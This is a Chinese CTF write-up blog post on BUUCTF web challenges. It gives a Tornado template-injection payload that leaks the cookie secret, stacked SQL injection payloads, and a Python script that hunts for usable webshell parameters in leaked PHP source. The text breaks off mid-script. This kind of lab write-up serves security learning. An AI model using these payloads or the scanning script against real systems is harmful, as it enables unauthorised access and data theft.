<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5"><title>BUUCTFDay2 | Manayakko - 微笑才是王道</title><meta name="description" content="复现学习"><meta name="keywords" content="writeup"><meta name="author" content="Manayakko"><meta name="copyright" content="Manayakko"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/yakko117/img/favicon.png"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin><meta name="twitter:card" content="summary"><meta name="twitter:title" content="BUUCTFDay2"><meta name="twitter:description" content="复现学习"><meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0kz0g6j30j60j6jtw.jpg"><meta property="og:type" content="article"><meta property="og:title" content="BUUCTFDay2"><meta property="og:url" content="https://manayakko.github.io/yakko117/2019/11/10/BuuctfDay2/"><meta property="og:site_name" content="Manayakko - 微笑才是王道"><meta property="og:description" content="复现学习"><meta property="og:image" content="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0kz0g6j30j60j6jtw.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>const autoChangeMode = 'false'
var t = Cookies.get("theme");
if (autoChangeMode == '1'){
const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

if (t === undefined){
  if (isLightMode) activateLightMode()
  else if (isDarkMode) activateDarkMode()
  else if (isNotSpecified || hasNoSupport){
    console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
    now = new Date();
    hour = now.getHours();
    isNight = hour < 6 || hour >= 18
    isNight ? activateDarkMode() : activateLightMode()
}
} else if (t == 'light') activateLightMode()
else activateDarkMode()


} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/yakko117/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://manayakko.github.io/yakko117/2019/11/10/BuuctfDay2/"><link rel="prev" title="BuuctfDay3" href="https://manayakko.github.io/yakko117/2019/11/18/BUUCTFDay3/"><link rel="next" title="RoarCTF2019复现(1)" href="https://manayakko.github.io/yakko117/2019/10/31/roarctf01/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/yakko117/',
  algolia: undefined,
  localSearch: {"path":"./search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://xxx/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: 'Snackbar.bookmark.title',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: false,
  copyright: {"languages":{"author":"作者: Manayakko","link":"链接: https://manayakko.github.io/yakko117/2019/11/10/BuuctfDay2/","source":"来源: Manayakko - 微笑才是王道","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。"}},
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  isHome: false,
  isPost: true
  
}</script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/yakko117/atom.xml" title="Manayakko - 微笑才是王道" type="application/atom+xml">
</head><body><header> <div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/yakko117/">Manayakko - 微笑才是王道</a></span><span class="toggle-menu pull_right close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/yakko117/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/link/"><i class="fa-fw fa fa-link"></i><span> 友情链接</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/about/"><i class="fa-fw fa fa-simplybuilt"></i><span> 关于本人</span></a></div></div></span><span class="pull_right" id="search_button"><a class="site-page social-icon search"><i class="fa fa-search fa-fw"></i><span> 搜索</span></a></span></div></header><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/yakko117/img/avatar.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/yakko117/archives/"><div class="headline">文章</div><div class="length_num">70</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/yakko117/tags/"><div class="headline">标签</div><div class="length_num">12</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/yakko117/categories/"><div class="headline">分类</div><div class="length_num">5</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/yakko117/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/link/"><i class="fa-fw fa fa-link"></i><span> 友情链接</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/about/"><i class="fa-fw fa fa-simplybuilt"></i><span> 关于本人</span></a></div></div></div><div id="mobile-sidebar-toc"><div class="toc_mobile_headline">目录</div><div class="sidebar-toc__content"><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#BUUCTF"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">BUUCTF</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#easy-tornado"><span class="toc_mobile_items-number">1.1.</span> <span class="toc_mobile_items-text">easy_tornado</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#SUCTF-2019-EasySQL"><span class="toc_mobile_items-number">1.2.</span> <span class="toc_mobile_items-text">[SUCTF 2019]EasySQL</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F%E8%A7%A3"><span class="toc_mobile_items-number">1.2.1.</span> <span class="toc_mobile_items-text">非预期解</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#%E9%A2%84%E6%9C%9F%E8%A7%A3%E6%B3%95"><span class="toc_mobile_items-number">1.2.2.</span> <span class="toc_mobile_items-text">预期解法</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#%E5%BC%BA%E7%BD%91%E6%9D%AF-2019-%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%E5%AE%A2"><span class="toc_mobile_items-number">1.3.</span> <span class="toc_mobile_items-text">[强网杯 2019]高明的黑客</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#HCTF-2018-admin"><span class="toc_mobile_items-number">1.4.</span> <span class="toc_mobile_items-text">[HCTF 2018]admin</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80-%E9%9D%9E%E9%A2%84%E6%9C%9F%E8%A7%A3"><span class="toc_mobile_items-number">1.4.1.</span> <span class="toc_mobile_items-text">解法一 (非预期解)</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C-Unicode%E6%AC%BA%E9%AA%97"><span class="toc_mobile_items-number">1.4.2.</span> <span class="toc_mobile_items-text">解法二 Unicode欺骗</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%89-flask-session%E4%BC%AA%E9%80%A0"><span class="toc_mobile_items-number">1.4.3.</span> <span class="toc_mobile_items-text">解法三 flask session伪造</span></a></li></ol></li></ol></li></ol></div></div></div><div id="body-wrap"><div id="web_bg" data-type="photo"></div><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true">     </i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#BUUCTF"><span class="toc-number">1.</span> <span class="toc-text">BUUCTF</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#easy-tornado"><span class="toc-number">1.1.</span> <span class="toc-text">easy_tornado</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SUCTF-2019-EasySQL"><span class="toc-number">1.2.</span> <span class="toc-text">[SUCTF 2019]EasySQL</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F%E8%A7%A3"><span class="toc-number">1.2.1.</span> <span class="toc-text">非预期解</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%84%E6%9C%9F%E8%A7%A3%E6%B3%95"><span class="toc-number">1.2.2.</span> <span class="toc-text">预期解法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%BA%E7%BD%91%E6%9D%AF-2019-%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%E5%AE%A2"><span class="toc-number">1.3.</span> <span class="toc-text">[强网杯 2019]高明的黑客</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HCTF-2018-admin"><span class="toc-number">1.4.</span> <span class="toc-text">[HCTF 2018]admin</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80-%E9%9D%9E%E9%A2%84%E6%9C%9F%E8%A7%A3"><span class="toc-number">1.4.1.</span> <span class="toc-text">解法一 (非预期解)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C-Unicode%E6%AC%BA%E9%AA%97"><span class="toc-number">1.4.2.</span> <span class="toc-text">解法二 Unicode欺骗</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%89-flask-session%E4%BC%AA%E9%80%A0"><span class="toc-number">1.4.3.</span> <span class="toc-text">解法三 flask session伪造</span></a></li></ol></li></ol></li></ol></div></div></div><main id="content-outer"><div id="top-container" style="background-image: url(https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0kz0g6j30j60j6jtw.jpg)"><div id="post-info"><div id="post-title"><div class="posttitle">BUUCTFDay2</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 发表于 2019-11-10<span class="post-meta__separator">|</span><i class="fa fa-history fa-fw" aria-hidden="true"></i> 更新于 2023-04-19</time><span class="post-meta__separator">|</span><span><i class="fa fa-inbox post-meta__icon fa-fw" aria-hidden="true"></i><a class="post-meta__categories" href="/yakko117/categories/%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/">做题笔记</a></span><div class="post-meta-wordcount"><div class="post-meta-pv-cv"></div></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><h1 id="BUUCTF"><a href="#BUUCTF" class="headerlink" title="BUUCTF"></a>BUUCTF</h1><h2 id="easy-tornado"><a href="#easy-tornado" class="headerlink" title="easy_tornado"></a>easy_tornado</h2><p>主要考点是：<strong>SSTi模板注入</strong><br>一些参考文献如下：<br><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/83999.html">SSTI模板注入浅谈</a><br><a target="_blank" rel="noopener" href="http://ch.vksec.com/2017/06/tornado.html">Tornado模板注入</a><br><a target="_blank" rel="noopener" href="https://tornado.readthedocs.io/en/stable/">官方手册</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/cimuhuashuimu/p/11544455.html">大佬的思路</a></p>
<hr>
<p>打开题目<br><a target="_blank" rel="noopener" href="https://wx3.sinaimg.cn/large/0077TIyQgy1g8nh0lfc57j307303ga9w.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://wx3.sinaimg.cn/large/0077TIyQgy1g8nh0lfc57j307303ga9w.jpg" class="lazyload"></a></p>
<p>点开每个链接的内容和URL格式如下</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">plaintext</div></div><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">/flag.txt</span><br><span class="line">flag in /fllllllllllllag</span><br><span class="line"></span><br><span class="line">/welcome.txt</span><br><span class="line">render</span><br><span class="line"></span><br><span class="line">/hints.txt</span><br><span class="line">md5(cookie_secret+md5(filename))</span><br><span class="line"></span><br><span class="line">http://localhost/file?filename=/hints.txt&amp;filehash=8fd6c75084d062081fb182f4d18d938c</span><br></pre></td></tr></table></figure></div>

<p>现在<code>filename=/fllllllllllllag</code>，只需要知道<code>cookie_secret</code>既能访问<code>flag</code>。<br>根据提示flag所在文件夹，加上路径去访问<br>发现无法访问，被跳转到一个错误页面<br>格式为 <code>/error?msg=Error</code> 开始判断是个模板注入</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0krwt0j30t105r0su.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0krwt0j30t105r0su.jpg" class="lazyload"></a></p>
<hr>
<p>翻了一下<a target="_blank" rel="noopener" href="https://tornado.readthedocs.io/en/latest/guide/templates.html">手册</a>发现一些可以输入的函数</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0krojnj30vy0ictc9.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0krojnj30vy0ictc9.jpg" class="lazyload"></a></p>
<p>找到个 <code>datetime</code><br>在Tornado的前端页面模板中，<code>datetime</code>是指向<code>python</code>中<code>datetime</code>这个模块<br>尝试注入， 回显如下</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">plaintext</div></div><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/error?msg=&#123;&#123;datetime&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0kob15j313405at98.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0kob15j313405at98.jpg" class="lazyload"></a></p>
<hr>
<p>通过查阅文档发现<code>cookie_secret</code>在<code>Application</code>对象settings属性中，还发现self.application.settings&#96;有一个<a target="_blank" rel="noopener" href="https://tornado.readthedocs.io/en/latest/web.html#tornado.web.RequestHandler.settings">别名</a></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">plaintext</div></div><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">RequestHandler.settings</span><br><span class="line">An alias for self.application.settings.</span><br></pre></td></tr></table></figure></div>
<p><code>handler</code>指向的处理当前这个页面的 <code>RequestHandler</code>对象，<br><code>RequestHandler.settings</code> 指向 <code>self.application.settings</code>，<br>因此 <code>handler.settings</code> 指向 <code>RequestHandler.application.settings</code>。</p>
<p>构造payload获取 <code>cookie_secret</code></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">plaintext</div></div><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/error?msg=&#123;&#123;handler.settings&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p><a target="_blank" rel="noopener" href="https://wx2.sinaimg.cn/large/0077TIyQgy1g8nh0kod92j31az04wjs0.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://wx2.sinaimg.cn/large/0077TIyQgy1g8nh0kod92j31az04wjs0.jpg" class="lazyload"></a></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">plaintext</div></div><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;cookie_secret&#x27;: &#x27;4099719d-a30b-4e20-a2b1-2186e5d29ee4&#x27;</span><br></pre></td></tr></table></figure></div>

<p>计算filehash值(用py2.x版本)</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">python</div></div><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">md5</span>(<span class="params">s</span>):</span><br><span class="line"> md5 = hashlib.md5() </span><br><span class="line"> md5.update(s) </span><br><span class="line"> <span class="keyword">return</span> md5.hexdigest()</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">filehash</span>():</span><br><span class="line"> filename = <span class="string">&#x27;/fllllllllllllag&#x27;</span></span><br><span class="line"> cookie_secret = <span class="string">&#x27;4099719d-a30b-4e20-a2b1-2186e5d29ee4&#x27;</span></span><br><span class="line"> <span class="built_in">print</span>(md5(cookie_secret+md5(filename)))</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line"> filehash()</span><br></pre></td></tr></table></figure></div>

<p>得到filehash如下</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">plaintext</div></div><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">a84914638153ac0968136ee5d5f19152</span><br><span class="line"></span><br><span class="line">提交payload如下：</span><br><span class="line">file?filename=/fllllllllllllag&amp;filehash=a84914638153ac0968136ee5d5f19152</span><br><span class="line"></span><br><span class="line">得到flag</span><br></pre></td></tr></table></figure></div>

<hr>
<h2 id="SUCTF-2019-EasySQL"><a href="#SUCTF-2019-EasySQL" class="headerlink" title="[SUCTF 2019]EasySQL"></a>[SUCTF 2019]EasySQL</h2><p>参考文献<br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/fireporsche/p/8618691.html">MySQL的sql_mode解析与设置</a></p>
<p>进入页面后，提示要求输入正确的Flag即可获得flag，存在堆叠注入如下，但是过滤了flag。</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0kom5xj30hy046aa1.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0kom5xj30hy046aa1.jpg" class="lazyload"></a></p>
<p>进行堆叠查询，<code>1; show tables #</code>，回显如下</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0ksjt6j30ii04574d.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0ksjt6j30ii04574d.jpg" class="lazyload"></a></p>
<p>根据回显猜测查询语句为：<code>.. POST[&#39;query&#39;]||flag ...</code></p>
<h3 id="非预期解"><a href="#非预期解" class="headerlink" title="非预期解"></a>非预期解</h3><p>构造payload：<code>*,1</code>，这样拼接后得到：<code>select *,1||flag from Flag</code> ，即可以查出当前表中全部内容。</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0ksuuuj30lp041glr.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQgy1g8nh0ksuuuj30lp041glr.jpg" class="lazyload"></a></p>
<h3 id="预期解法"><a href="#预期解法" class="headerlink" title="预期解法"></a>预期解法</h3><div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">plaintext</div></div><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">PIPES_AS_CONCAT：</span><br><span class="line">将&quot;||&quot;视为字符串的连接操作符而非或运算符</span><br></pre></td></tr></table></figure></div>

<p>所以payload为：<code>1;set sql_mode=PIPES_AS_CONCAT;select 1</code><br>这样输出的flag会与1进行拼接，得到：</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133rj6ij30p303z0sz.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133rj6ij30p303z0sz.jpg" class="lazyload"></a></p>
<hr>
<h2 id="强网杯-2019-高明的黑客"><a href="#强网杯-2019-高明的黑客" class="headerlink" title="[强网杯 2019]高明的黑客"></a>[强网杯 2019]高明的黑客</h2><p>打开题目，说文件源码泄露</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133vcqrj30yn05cq3o.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o133vcqrj30yn05cq3o.jpg" class="lazyload"></a></p>
<p>下载<code>www.tar.gz</code>， 查看发现全是些混淆的乱码，但还是可以看出规律<br>可以通过GET，POST，exec，eval，assert传参回显</p>
<p><a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o1340o6gj30kk0fn0w3.jpg" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g8o1340o6gj30kk0fn0w3.jpg" class="lazyload"></a></p>
<p>结合wp的脚本批量扫描一下文件里的<code>$_GET</code>和<code>$_POST</code>，然后统一赋值echo “got it”，如果回显结果中包含got it，那么证明该文件为可用shell</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">python</div></div><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">// 大佬的这个我没跑出来</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> multiprocessing <span class="keyword">import</span> Pool</span><br><span class="line"></span><br><span class="line">path = <span class="string">&quot;D:/phpStudy/PHPTutorial/WWW/src/&quot;</span></span><br><span class="line">files = os.listdir(path)</span><br><span class="line">url = <span class="string">&quot;http://localhost/src/&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">extract</span>(<span class="params">f</span>):</span><br><span class="line">    gets = []</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(path+f, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        lines = f.readlines()</span><br><span class="line">        lines = [i.strip() <span class="keyword">for</span> i <span class="keyword">in</span> lines]</span><br><span class="line">        <span class="keyword">for</span> line <span class="keyword">in</span> lines:</span><br><span class="line">            <span class="keyword">if</span> line.find(<span class="string">&quot;$_GET[&#x27;&quot;</span>) &gt; <span class="number">0</span>:</span><br><span class="line">                start_pos = line.find(<span class="string">&quot;$_GET[&#x27;&quot;</span>) + <span class="built_in">len</span>(<span class="string">&quot;$_GET[&#x27;&quot;</span>)</span><br><span class="line">                end_pos = line.find(<span class="string">&quot;&#x27;&quot;</span>, start_pos)</span><br><span class="line">                gets.append(line[start_pos:end_pos])</span><br><span class="line">    <span class="keyword">return</span> gets</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exp</span>(<span class="params">start, end</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(start, end):</span><br><span class="line">        filename = files[i]</span><br><span class="line">        gets = extract(filename)</span><br><span class="line">        <span class="built_in">print</span> <span class="string">&quot;try: %s&quot;</span> % filename</span><br><span class="line">        <span class="keyword">for</span> get <span class="keyword">in</span> gets:</span><br><span class="line">            new_url = <span class="string">&quot;%s%s?%s=%s&quot;</span> % (url, filename, get, <span class="string">&#x27;echo &quot;got it&quot;&#x27;</span>)</span><br><span class="line">            r = requests.get(new_url)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;got it&#x27;</span> <span class="keyword">in</span> r.content:</span><br><span class="line">                <span class="built_in">print</span> new_url</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    pool = Pool(processes=<span class="number">15</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(files), <span class="built_in">len</span>(files)/<span class="number">15</span>):</span><br><span class="line">        pool.apply_async(exp, (i, +<span class="built_in">len</span>(files)/<span class="number">15</span>,))</span><br><span class="line">    pool.close()</span><br><span class="line">    pool.join()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span 